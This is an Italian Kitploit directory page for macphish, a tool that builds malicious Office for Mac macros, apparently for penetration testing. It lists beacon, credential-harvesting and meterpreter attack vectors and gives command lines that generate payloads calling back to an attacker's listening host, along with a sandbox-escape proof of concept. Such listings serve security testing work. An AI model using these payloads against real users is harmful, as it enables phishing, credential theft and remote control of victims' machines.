Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
macphish — Genera macro dannose per Office su Mac con payload beacon, credential harvesting e meterpreter per test di phishing e exploitation su macOS. | Kitploit
Strumenti/GitHubGitHub/cldrn/macphish
Generazione di PayloadExploitPhishing
GitHubcldrn/macphish

macphish

Genera macro dannose per Office su Mac con payload beacon, credential harvesting e meterpreter per test di phishing e exploitation su macOS.

Vedi Repository
245504911 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

macphish

Generatore di Payload per Macro di Office per Mac macphish

Vettori di attacco

Sono disponibili 4 vettori di attacco:

  • beacon
  • creds
  • meterpreter
  • meterpreter-grant

Per il metodo 'creds', macphish può generare direttamente lo script Applescript, nel caso in cui sia necessario eseguirlo da una shell.

beacon

All'esecuzione, questo payload invierà un segnale al nostro host in ascolto e fornirà informazioni di base sul sistema della vittima. Il modo più semplice per generare un payload beacon è:

root@kitploit:~
$./macphish.py -lh <listening host> 

Per impostazione predefinita, utilizza curl, ma è possibile usare altre utility (wget, nslookup) modificando il template del comando.

creds

root@kitploit:~
$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

Il modo più semplice per generare un payload meterpreter è:

root@kitploit:~
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter 

meterpreter-grant

Per generare un payload meterpreter che chiami prima GrantAccessToMultipleFiles():

root@kitploit:~
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

Per gli attacchi meterpreter, al momento sono supportati solo payload python.

Utilizzo

Vedi https://github.com/cldrn/macphish/wiki/Usage

PoCs

  • Evasione della sandbox utilizzando GrantAccessToMultipleFiles in Word per Mac
  • PoC delle autorizzazioni globali e ricorsive - Macro dannose per Word in macOS
  • Esecuzione di Meterpreter in Office per Mac con macro
  • Raccolta di credenziali (Phishing) con macro di Word in macOS
Scarica lo strumento